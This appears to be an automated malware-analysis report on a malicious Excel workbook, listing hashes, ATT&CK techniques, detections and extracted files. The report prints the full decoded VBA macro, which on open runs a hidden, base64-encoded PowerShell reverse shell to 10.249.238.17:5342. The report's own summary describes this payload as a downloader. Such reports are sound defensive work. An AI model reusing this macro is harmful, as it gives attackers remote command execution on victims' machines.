Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 877436fc86633f5b…

MALICIOUS

Office (OOXML)

13.2 KB Created: 2021-09-28 07:49:45 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-10-01
MD5: 8870aa8406530a11f8a3ec6bb9d4d7bf SHA-1: 947e15533f053cd0c1112148e6c124e9021c6611 SHA-256: 877436fc86633f5bf44fb196c7807411435cd08c9f53256ea9c369ec88ff0e91
600 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell T1105 Ingress Tool Transfer

The sample contains VBA macros that trigger on opening the document, specifically utilizing Auto_Open. These macros employ WScript.Shell and CreateObject to execute a command-line that launches PowerShell. The PowerShell command is heavily obfuscated but appears to establish a TCP connection to '10.249.238.17:5342' and subsequently download and execute a second-stage payload. This indicates a downloader functionality.

Heuristics 12

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML medium 9 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2409 bytes
SHA-256: 5c4df2740dd6d4edf6ca1bd0b133a01ae00156c2236fd575bc4726755734b868
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains a PowerShell -EncodedCommand style payload.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()

    Dim str01 As String
    Dim str02 As String
    Dim str03 As String
    Dim str04 As String
    Dim str05 As String
    Dim str06 As String
    Dim str07 As String
    Dim str08 As String
    Dim str09 As String

    str01 = "cmd.exe /S /C powershell -NoP -NonI -W Hidden -EP ByPass -Enc JABhAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AUwBvAGMA"
    str02 = "awBlAHQAcwAuAFQAYwBwAEMAbABpAGUAbgB0ACgAIgAxADAALgAyADQAOQAuADIAMwA4AC4AMQA3ACIALAA1ADMANAAyACkAOwAkAGIAPQAkAGEALgBHAG"
    str03 = "UAdABTAHQAcgBlAGEAbQAoACkAOwAkAGQAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAIAAkAGIAOwAk"
    str04 = "AGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAIAAkAGIAOwAkAGUALgBBAHUAdABvAEYAbAB1AHMAaA"
    str05 = "A9ACQAdAByAHUAZQA7ACQAZQAuAFcAcgBpAHQAZQAoACIAUABTACAAIgArACgARwBMACkALgBQAGEAdABoACsAIgA+ACAAIgApADsAdwBoAGkAbABlACgA"
    str06 = "JABhAC4AQwBvAG4AbgBlAGMAdABlAGQAIAAtAGEAbgBkACAAKAAkAGYAPQAkAGQALgBSAGUAYQBkAEwAaQBuAGUAKAApACkAIAAtAGEAbgBkACAAJABmAC"
    str07 = "AALQBpAG4AbwB0AG0AYQB0AGMAaAAgACIAXgAoAGUAeABpAHQAfABxAHUAaQB0ACkAJAAiACkAewAoAEkARQBYACAALQBjACAAIgAkAGYAIAAqAD4AJgAx"
    str08 = "ACIAKQB8ACUAewAkAGUALgBXAHIAaQB0AGUATABpAG4AZQAoACQAXwApAH0AOwAkAGUALgBXAHIAaQB0AGUAKAAiAGAAbgBQAFMAIAAiACsAKABHAEwAKQ"
    str09 = "AuAFAAYQB0AGgAKwAiAD4AIAAiACkAfQA7ACQAYQAuAEMAbABvAHMAZQAoACkA"

    Dim wsh As Object
    Set wsh = VBA.CreateObject("WScript.Shell")
    Dim waitOnReturn As Boolean: waitOnReturn = True
    Dim windowStyle As Integer: windowStyle = 1

    wsh.Run str01 & str02 & str03 & str04 & str05 & str06 & str07 & str08 & str09, windowStyle

End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 13824 bytes
SHA-256: 24260f4ec1012b4a850d9a09d398ce7d5cb52ab60902e9e0f39a45e3b4bdc71c
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: likely
Carved artifact contains a PowerShell -EncodedCommand style payload.

Open this report in the interactive analyzer, or submit your own file for analysis.